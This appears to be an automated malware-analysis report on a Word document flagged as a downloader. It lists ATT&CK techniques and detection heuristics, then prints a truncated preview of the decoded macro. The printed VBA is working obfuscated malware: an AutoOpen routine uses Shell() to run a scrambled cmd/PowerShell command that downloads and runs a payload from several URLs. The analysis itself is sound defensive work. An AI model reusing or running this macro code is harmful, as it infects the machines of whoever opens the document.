Verdict: MALICIOUS
Risk score: 202

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1105 Ingress Tool Transfer

The sample contains a VBA macro with an AutoOpen subroutine that utilizes the Shell() function. This function is used to execute a command-line utility, likely for downloading and executing a second-stage payload. The ClamAV heuristic also flags it as a downloader.
Heuristics (6):
- ClamAV: Doc.Downloader.Nastjencro-6682581-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Nastjencro-6682581-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5008 bytes | d8f556930e6c793036d26fb49c90f3387fff19b3b3c3042e8014e2d3f6d7ebab |
Preview script (first 1,000 lines of the extracted script, macros.bas):

```vba
Attribute VB_Name = "FqbciqGtwBwuc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Set utbfpj = djuwo
Set nWNOpc = wczszW
Set iMqKWn = JBXdd
Set OiELWi = Oowmv
Set msNHrL = MHWzM
Set tkhNw = zXjnTE
Shell VzqHBzaQj + vXzqHfWOzF + BJuTjjKtKmH + vjaBJVlraMN, Format(0)
Set cwCUjB = RXvwD
Set BbhNJI = jnorb
End Sub
Attribute VB_Name = "nbwhzlh"
Function VzqHBzaQj()
On _
Error _
Resume _
Next
Set csHou = wtOsjC
Set bnObDw = owpWF
Set OnWZVr = jUXtD
Set HZBYT = oAsczk
jwJqCmH = Format(Chr(12 + 7 + 7 + 18 + 55)) + "md " + "/V:/" + Format(Chr(8 + 4 + 4 + 12 + 39)) + Format(Chr(3 + 2 + 2 + 5 + 22)) + "s^e^" + "t " + "w^uj^2=" + " ^ " + " ^ ^ "
Set RSoJOf = VHjCIr
Set hzKzjX = wmhvNu
Set lLinDF = uXtjD
Set QjwjBu = ZjIZcT
qKmrSiwEG = "^" + " ^ " + "^ " + " ^ ^" + " ^ }^" + "}" + "{h" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "^t^"
Set Rjbfv = ZEQlcF
Set zTuHV = wjtzd
ijpsLadNiz = "a" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "^}^" + ";" + "^ka^er^" + "b;" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "Qn^$" + " m^e^" + "tI-" + "^e^k^" + "ovn^I" + ";)" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "Qn$ " + ",^j^Sa" + "$(^el" + "^i^"
Set OalDS = bAcOw
Set sQPRs = aIFiMf
Set lmbCi = zqqAZ
Set iwrfKv = GQihlZ
okwNakOZ = "Fd^a^" + "oln^" + "w" + "o^D." + "r" + "^" + "ij${" + "yrt{"
Set rZXrj = NAMNPG
PGHmkbHEXpN = ")wN^s" + "$ ni jS" + "^" + "a^$(h" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "^" + "a" + "^er" + "of;" + "'e^x^"
Set sFCvJ = CBkjO
Set tRJFi = waBvAo
Set TwfoEq = pfWJH
Set XnKUVF = uEKXU
bjqivt = "e" + ".'^+^w^" + "w^" + "H$+^'\" + "^'+" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "i^l" + "^b" + "u" + "p^:vn^" + "e^$^="
Set JCHYWj = FrJdt
itzqfNc = Format(Chr(12 + 7 + 7 + 18 + 55)) + "^Q" + "n$^;^'9" + "^81^' ^" + "= w^w^H" + "^$^;" + ")'@^'" + "(t" + "il^p^" + "S^" + ".^'" + "^" + "8"
Set wamKDN = fSfjYs
Set kPazV = BjYFS
Set KrLDI = NzhQl
Set WotnK = kaZNS
sdFSrdHqO = "X^D^" + "JJ^E^" + "U" + "^Y^x/^" + "m^o" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "^.^" + "h" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "et^-s" + "ni" + "^m//^:p"
Set urNEk = SUaTjP
Set UCzpT = wNqlvG
Set ldswsA = FUMAw
KvEzDXrW = "t^t^h@O" + "^EMu^" + "e" + "7^p" + "^" + "Tr" + "/^kd^"
Set ZGulc = XOdnS
Set BcJiha = zakXap
pdskkb = ".^8^" + "1^0^2g" + "^o^f" + "n//^" + ":ptt" + "^h@"
VzqHBzaQj = jwJqCmH + qKmrSiwEG + ijpsLadNiz + okwNakOZ + PGHmkbHEXpN + bjqivt + itzqfNc + sdFSrdHqO + KvEzDXrW + pdskkb
Set TFMiiR = dJitZ
Set pVrwzQ = AUVlOP
Set ZjlEr = VQfSQ
Set XLnso = oRbXik
Set KLpVi = bztEJ
End Function
Function vXzqHfWOzF()
On _
Error _
Resume _
Next
Set wJCUuu = Eqwin
Set RjiwrU = OtzSo
Set cwwuk = wkBpwp
iDjDmfJFat = "n^y5Rz" + "^d^w/" + "^" + "m^o" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "^" + ".d^er"
Set hziND = zKbvGf
Set DBFPK = tAnDLb
Set tBCMMs = zobbJ
Set VzdEOU = orawYc
PpwsXOW = "a^" + "uqs" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "n//:p^" + "tth" + "@^INv^" + "9" + "nb" + "ggZ^H" + "/^m^" + "o" + Format(Chr(12 + 7 + 7 + 18 + 55))
Set CbKRRZ = tTrEDN
Set AwIfoZ = MMkEJ
Set nQinN = zzLUv
TnYcpYli = "." + Format(Chr(12 + 7 + 7 + 18 + 55)) + "^" + "u^hphna" + "^h" + "rm//^:" + "^p^tth^" + "@^l^Wa" + "3" + Format(Chr(8 + 4 + 4 + 12 + 39)) + "RJK/"
Set bIwzmj = pMZZB
Set XQtbNm = ZUCXBv
Set hMPRff = aQzEnA
Set TcORfz = naCwJ
Set khpVpw = dwpQNv
Set MikCd = fpFFw
KaIjzvip = "^t^en.n" + "e^wi^" + "l^yrra" + "h//" + "^"
Set jPtGMC = qTaPKZ
UQGYAM = ":^p^t" + "t^h'=wN" + "^s^$;t" + "nei^l" + Format(Chr(8 + 4 + 4 + 12 + 39)) + "^" + "b^e^" + "W^.te" + "N^ t" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "e" + "j^b^o-^" + "w^en=r^" + "ij" + "^$" + " l^leh" + "sr^ew^o"
Set AmZLM = oQrcoh
Set dAMzcJ = uijilu
Set nbnWr = XG
```

... (truncated)